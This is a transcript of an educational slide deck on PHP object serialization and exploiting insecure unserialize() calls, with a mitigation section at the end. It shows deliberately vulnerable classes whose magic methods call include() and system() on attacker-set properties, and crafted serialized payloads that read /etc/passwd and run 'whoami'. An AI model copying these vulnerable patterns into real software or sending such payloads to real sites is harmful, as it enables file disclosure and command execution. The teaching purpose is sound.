Closer look at PHP Unserialization by Ashwin Shenoi

A Closer Look Into
PHP
Unserialization
S Ashwin Shenoi

php > system(“whoami”);
● S Ashwin Shenoi (@c3rb3ru5)
● 2nd year BTech CSE @ Amrita School of Engineering,
Amritapuri
● CTF Player @teambi0s
● Web Exploitation
● Organising team @InCTF and InCTFj
● Twitter: @__c3rb3ru5__

php > echo “Agenda”;
● PHP Classes and Objects
● Serialization and unserialization
● What are magic functions
● Vulnerabilities of unserialize() function
● Exploiting unserialize()
● Mitigation

● Programmer defined data structure which consists of local data
(attributes or properties) as well as local functions.
php > echo “PHP Classes”;
class Test {
public $name;
public $age;
public function __construct( ) {
$this->name = "Ashwin";
$this->age = 19;
}
}

php > echo “PHP Objects”;
● An object is a data type which stores data and
information on how to process that data.
● An Object is an individual instance of the data
structure defined by a class.
● We define a class once and then make many objects that
belong to it.
$person = new Test( );

● PHP Classes and Objects
● Serialization and unserialization
● What are magic functions
● Vulnerabilities of unserialize() function
● Exploiting unserialize()
● Mitigation
php > echo “Agenda”;

php > echo “What is serialization”;
● Converting a complex data structure such
as a class object or arrays into strings.
● Easier for transmission and storage.
● Stored representation of an object.

php > echo “What is serialization”;
● Example Scenarios:
○ Passing objects via URL Query parameters or cookies.
○ Storing object data in text or in a single database
field
■ serialize( ) the object to a string
■ Store the object into the database or text
■ unserialize( ) the stored string back to a PHP Object

php > serialization();
● Double
○ d:<value>;
○ d:12.1234;
● NULL
○ N;
● Integers
○ i:<value>;
○ i:100;
○ i:-200;
● Boolean
○ b:<value>;
○ b:1; // TRUE
○ b:0; // FALSE

● Strings
○ s:<length>:“<value>”;
○ s:6:“Ashwin”;
● Arrays
○ a:<length>:{<key>;<value>;}
○ a:2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}
■ // array( "name" => "Ashwin" , "age" => 19 );

php > $a = 5;
php > var_dump($a);
int(5)
php > echo serialize($a);
i:5;
php > $b = unserialize('i:5;');
php > echo $b;
5
php > var_dump($b);
int(5)
php > $c = "Ashwin";
php > var_dump($c);
string(6) "Ashwin"
php > echo serialize($c);
s:6:"Ashwin";
php > $d =
unserialize('s:6:"Ashwin";');
php > echo $d;
Ashwin
php > var_dump($d);
string(6) "Ashwin"

O:4:"Test":2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}
object(Test)#1 (2) {
["name"]=>
string(6) "Ashwin"
["age"]=>
int(19)
}
O:<class name length>:"<class name>":<number of properties>:{ <properties> };

php > echo “__Magic_Methods( )”;
● Reserved functions whose function names start with “__”.
● Magic methods are named after the specific action that leads
to their execution.
● All magic methods MUST be declared as public.
● Automatically called, so need not be explicitly called or
invoked.
● Magic methods can be called and executed after
unserialization.

__sleep( )
__wakeup( )
__toString( )
__invoke( )
__set_state( )
__clone( )
__debugInfo( )
__construct( )
__destruct( )
__call( )
__callStatic( )
__get( )
__set( )
__isset( )
__unset( )

● __construct( )
○ Normally used to initialise data in variables.
○ First method called after object creation.
○ If you do not explicitly declare it, then there will be a
default constructor with no parameters and empty content in
the class.

● __destruct( )
○ Perform some operations before destroying an object, such as
closing a file, etc
○ Called as soon as there are no other references to a
particular object, or in any order during the shutdown
sequence.
○ Unlike the constructor the destructor cannot have any
parameters.

● __wakeup( )
○ Called as soon as PHP encounters a unserialize( ) function.
○ Often used to rebuild database connections, or perform other
initialization operations.
○ This is kind of like the opposite of what the __sleep( ) magic
function does, which is automatically called when serialize( )
function is called.

So how on earth is this vulnerable?

php > echo “Vulnerability”;
● unserialize( ) function is SECURE, IF USER CANNOT
INFLUENCE THE INPUT.

php > echo “Vulnerability”;
● In order to successfully exploit an unserialize bug, two
conditions HAVE to be satisfied:
○ PHP Magic Method (eg. __destruct or __wakeup), that has
malicious code, or can start a POP chain.
○ All classes used for the attack should be declared and
imported properly by the time of unserialization, or else it
has to support class autoloading.

php > echo “Exploit 1”;
class Example1 {
public $file;
// Random PHP Code
}
public function __destruct( ) {
if ( file_exists ( $this->file ) ) {
include ( $this->file );
}
}
}
…..
// Random PHP Code
$data = unserialize($_GET[‘input’]);
// Random PHP Code
…..

…..
public function __destruct( ) {
if ( file_exists ( $this->file ) ) {
include ( $this->file );
}
}
…..
$data = unserialize($_GET[‘input’]);
http://example.com/?input=O:8:"Example1":1:{s:4:"file";s:11:"/etc/passwd";}

class Example2 {
public $cmd;
// Random PHP Code
}
public function __wakeup( ) {
if ( isset ( $this->cmd ) ) {
system ( $this->cmd );
}
}
}
…..
// Random PHP Code
$data = unserialize($_COOKIE[‘input’]);
// Random PHP Code
…..

…..
public function __wakeup( ) {
if ( isset ( $this->cmd ) ) {
system ( $this->cmd );
}
}
…..
$data = unserialize($_COOKIE[‘input’]);
GET / HTTP/1.1
Host: example.com
Cookie: input=O:8:"Example2":1:{s:3:"cmd";s:6:"whoami";}

php > echo “Mitigation”;
● PHP7 has added an additional parameter, “options”, to
the unserialize( ) function.
○ unserialize($str, [‘allowed classes’ => false]);
● Never use the unserialize( ) function on user
controllable input.
● Instead use JSON format.
○ json_encode( )
○ json_decode( )

Closer look at PHP Unserialization by Ashwin Shenoi

More Related Content

What's hot

Similar to Closer look at PHP Unserialization by Ashwin Shenoi

More from Cysinfo Cyber Security Community

Recently uploaded

Closer look at PHP Unserialization by Ashwin Shenoi